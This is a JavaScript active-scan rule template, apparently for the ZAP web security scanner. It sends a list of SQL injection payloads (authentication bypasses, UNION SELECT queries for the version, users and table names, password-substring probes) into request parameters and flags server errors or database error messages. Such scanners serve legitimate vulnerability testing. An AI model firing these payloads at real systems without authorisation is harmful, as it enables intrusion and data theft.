  1. // An example active scan rule script which uses a set of attack payloads and a set of regexes
  2. // in order to find potential issues.
  3. // Replace or extend the attacks and evidence regexes with your own values.
  4.  
  5. // Note that new active scripts will initially be disabled
  6. // Right click the script in the Scripts tree and select "enable"  
  7.  
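// Replace or extend these with your own attacks.
// Put the attacks you most want to run higher, unless you disable the attack strength check in scan().
// Each entry is sent verbatim as the parameter value; the response is then checked for a 5xx
// status or for one of the `evidence` patterns. Keep every payload on a single line: a line
// break inside one of these string literals is a syntax error and the whole script fails to load.
var attacks = [
    '==',
    '=',
    "'",
    "' --",
    "' #",
    "' –",
    "'--",
    "'/*",
    "'#",
    '" --',
    '" #',
    '"/*',
    "' and 1='1",
    "' and a='a",
    ' or 1=1',
    ' or true',
    "' or ''='",
    '" or ""="',
    "1′) and '1′='1–",
    "' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055",
    '" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055',
    ' and 1=1',
    ' and 1=1–',
    "' and 'one'='one",
    "' and 'one'='one–",
    "' group by password having 1=1--",
    "' group by userid having 1=1--",
    "' group by username having 1=1--",
    " like '%'",
    ' or 0=0 --',
    ' or 0=0 #',
    ' or 0=0 –',
    "' or         0=0 #",
    "' or 0=0 --",
    "' or 0=0 #",
    "' or 0=0 –",
    '" or 0=0 --',
    '" or 0=0 #',
    '" or 0=0 –',
    "%' or '0'='0",
    ' or 1=1',
    ' or 1=1--',
    ' or 1=1/*',
    ' or 1=1#',
    ' or 1=1–',
    "' or 1=1--",
    "' or '1'='1",
    "' or '1'='1'--",
    "' or '1'='1'/*",
    "' or '1'='1'#",
    "' or '1′='1",
    "' or 1=1",
    "' or 1=1 --",
    "' or 1=1 –",
    "' or 1=1--",
    "' or 1=1;#",
    "' or 1=1/*",
    "' or 1=1#",
    "' or 1=1–",
    "') or '1'='1",
    "') or '1'='1--",
    "') or '1'='1'--",
    "') or '1'='1'/*",
    "') or '1'='1'#",
    "') or ('1'='1",
    "') or ('1'='1--",
    "') or ('1'='1'--",
    "') or ('1'='1'/*",
    "') or ('1'='1'#",
    "'or'1=1",
    "'or'1=1′",
    '" or "1"="1',
    '" or "1"="1"--',
    '" or "1"="1"/*',
    '" or "1"="1"#',
    '" or 1=1',
    '" or 1=1 --',
    '" or 1=1 –',
    '" or 1=1--',
    '" or 1=1/*',
    '" or 1=1#',
    '" or 1=1–',
    '") or "1"="1',
    '") or "1"="1"--',
    '") or "1"="1"/*',
    '") or "1"="1"#',
    '") or ("1"="1',
    '") or ("1"="1"--',
    '") or ("1"="1"/*',
    '") or ("1"="1"#',
    ") or '1′='1–",
    ") or ('1′='1–",
    "' or 1=1 LIMIT 1;#",
    "'or 1=1 or ''='",
    '"or 1=1 or ""="',
    "' or 'a'='a",
    "' or a=a--",
    "' or a=a–",
    "') or ('a'='a",
    '" or "a"="a',
    '") or ("a"="a',
    '\') or (\'a\'=\'a and hi") or ("a"="a',
    "' or 'one'='one",
    "' or 'one'='one–",
    "' or uid like '%",
    "' or uname like '%",
    "' or userid like '%",
    "' or user like '%",
    "' or username like '%",
    "' or 'x'='x",
    "') or ('x'='x",
    '" or "x"="x',
    "' OR 'x'='x'#;",
    "'=' 'or' and '=' 'or'",
    "' UNION ALL SELECT 1, @@version;#",
    // This payload was split across two lines in the pasted copy, which broke the string literal.
    "' UNION ALL SELECT system_user(),user();#",
    "' UNION select table_schema,table_name FROM information_Schema.tables;#",
    "admin' and substring(password/text(),1,1)='7",
    "' and substring(password/text(),1,1)='7",
    "' or 1=1 limit 1 -- -+",
    '\'="or\''
];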
  11.  
  12.  
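// Replace or extend these with your own evidence - regexes that indicate potential issues.
// The default ones are a subset of https://github.com/fuzzdb-project/fuzzdb/blob/master/regex/errors.txt
// The entries are joined with "|" into one case-insensitive RegExp in scan(), so every entry is
// regex syntax, not plain text: a literal "." must be written as "\\." (inside a normal JS string
// a single "\." is just "."), and a bare "." matches any character. Several entries ("Index of",
// "on line", "Error Report", "Fatal error", ...) are deliberately broad and will match benign
// pages; treat a hit as a prompt for manual review rather than a confirmed finding.
var evidence = [
    "A syntax error has occurred",
    "Active Server Pages error",
    "ADODB\\.Field error",
    "An illegal character has been found in the statement",
    "An unexpected token .* was found",
    "ASP\\.NET is configured to show verbose error messages",
    "ASP\\.NET_SessionId",
    "Custom Error Message",
    "database error",
    "DB2 Driver",
    "DB2 Error",
    "DB2 ODBC",
    "detected an internal error",
    "Error converting data type varchar to numeric",
    "Error Diagnostic Information",
    "Error Report",
    "Fatal error",
    "Incorrect syntax near",
    "Index of",
    "Internal Server Error",
    "Invalid Path Character",
    "Invalid procedure call or argument",
    "invalid query",
    "Invision Power Board Database Error",
    "is not allowed to access",
    "JDBC Driver",
    "JDBC Error",
    "JDBC MySQL",
    "JDBC Oracle",
    "JDBC SQL",
    "Microsoft OLE DB Provider for ODBC Drivers",
    "Microsoft VBScript compilation error",
    "Microsoft VBScript error",
    "MySQL Driver",
    "mysql error",
    "MySQL Error",
    "mySQL error with query",
    "MySQL ODBC",
    "ODBC DB2",
    "ODBC Driver",
    "ODBC Error",
    "ODBC Microsoft Access",
    "ODBC Oracle",
    "ODBC SQL",
    "OLE/DB provider returned message",
    "on line",
    "on MySQL result index",
    "Oracle DB2",
    "Oracle Driver",
    "Oracle Error",
    "Oracle ODBC",
    "Parent Directory",
    "PHP Error",
    "PHP Parse error",
    "PHP Warning",
    "PostgreSQL query failed",
    "server object error",
    "SQL command not properly ended",
    "SQL Server Driver",
    "SQLException",
    "supplied argument is not a valid",
    "Syntax error in query expression",
    "The error occurred in",
    "The script whose uid is",
    "Type mismatch",
    "Unable to jump to row",
    "Unclosed quotation mark before the character string",
    "unexpected end of SQL command",
    "unexpected error",
    "Unterminated string constant",
    "Warning: mysql_query",
    "Warning: pg_connect",
    "You have an error in your SQL syntax near"
];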
  90.  
/**
 * Scans a "node", i.e. an individual entry in the Sites Tree.
 * The scanNode function will typically be called once for every page.
 *
 * This script only attacks individual parameters (see scan), so there is
 * nothing to do per node; the function is kept because the scan engine
 * expects it to exist.
 *
 * @param as - the ActiveScan parent object that will do all the core interface tasks
 *     (i.e.: sending and receiving messages, providing access to Strength and Threshold settings,
 *     raising alerts, etc.). This is an ScriptsActiveScanner object.
 * @param msg - the HTTP Message being scanned. This is an HttpMessage object.
 */
function scanNode(as, msg) {
    // Intentionally empty - per-parameter work happens in scan().
}
  103.  
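/**
 * Scans a specific parameter in an HTTP message.
 * The scan function will typically be called for every parameter in every URL and Form for every page.
 *
 * For each payload in `attacks` (bounded by the configured attack strength) the parameter is set
 * to the payload on a cloned request, the request is sent, and an alert is raised via raiseAlert()
 * if the response is a 5xx or its body matches one of the `evidence` regexes. At most one alert is
 * raised per parameter; the loop also stops as soon as the scan is stopped.
 *
 * @param as - the ActiveScan parent object that will do all the core interface tasks
 *     (i.e.: sending and receiving messages, providing access to Strength and Threshold settings,
 *     raising alerts, etc.). This is an ScriptsActiveScanner object.
 * @param msg - the HTTP Message being scanned. This is an HttpMessage object.
 * @param {string} param - the name of the parameter being manipulated for this test/scan.
 * @param {string} value - the original parameter value.
 */
function scan(as, msg, param, value) {
    // Debugging can be done using print like this
    //print('scan called for url=' + msg.getRequestHeader().getURI().toString() +
    //  ' param=' + param + ' value=' + value);

    var max_attacks = attacks.length    // No limit for the "INSANE" level ;)

    // Recommended number of attacks per strength; feel free to change these locally ;)
    var strength = as.getAttackStrength();
    if (strength == "LOW") {
        max_attacks = 6;
    } else if (strength == "MEDIUM") {
        max_attacks = 12;
    } else if (strength == "HIGH") {
        max_attacks = 24;
    }
    // Never index past the end of the payload list
    if (max_attacks > attacks.length) {
        max_attacks = attacks.length;
    }

    // Build the evidence matcher once rather than on every iteration
    var evidenceRe = new RegExp(evidence.join("|"), "i");

    // Plain counted loop: exactly max_attacks payloads are tried (the previous for..in
    // version compared a string index and let one extra payload through).
    for (var i = 0; i < max_attacks; i++) {
        // Check if the scan was stopped before sending another request
        if (as.isStop()) {
            return;
        }

        var attack = attacks[i];

        // Always clone the original request so each payload starts from a clean copy
        var req = msg.cloneRequest();

        // setParam (message, parameterName, newValue)
        as.setParam(req, param, attack);

        // sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
        as.sendAndReceive(req, false, false);

        // Generic check: any server error is worth reporting
        var code = req.getResponseHeader().getStatusCode();
        if (code >= 500 && code < 600) {
            // raiseAlert expects a String for evidence
            raiseAlert(as, req, param, attack, String(code));
            // Only raise one alert per param
            return;
        }

        // Evidence check: report the matched text, not the whole match array
        var body = req.getResponseBody().toString();
        var found = body.match(evidenceRe);
        if (found) {    // Change to a test which detects the vulnerability
            raiseAlert(as, req, param, attack, found[0]);
            // Only raise one alert per param
            return;
        }
    }
}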
  168.  
/**
 * Raises a low-risk, low-confidence alert for the given parameter and payload.
 * Replace the title, description, other info and solution with more suitable information.
 *
 * Underlying call: raiseAlert(risk, int confidence, String name, String description, String uri,
 *      String param, String attack, String otherInfo, String solution, String evidence,
 *      int cweId, int wascId, HttpMessage msg)
 *
 * @param as - the ScriptsActiveScanner object that actually records the alert.
 * @param msg - the HttpMessage whose request URI is reported and which is attached to the alert.
 * @param {string} param - the name of the parameter that was attacked.
 * @param {string} attack - the payload that was sent.
 * @param {string} evidence - the response evidence to show in the alert.
 */
function raiseAlert(as, msg, param, attack, evidence) {
    var risk = 1;        // 0: info, 1: low, 2: medium, 3: high
    var confidence = 1;  // 0: falsePositive, 1: low, 2: medium, 3: high, 4: confirmed
    var cweId = 0;
    var wascId = 0;
    var uri = msg.getRequestHeader().getURI().toString();

    as.raiseAlert(risk, confidence, 'Active Vulnerability Title', 'Full description', uri,
        param, attack, 'Any other info', 'The solution ', evidence, cweId, wascId, msg);
}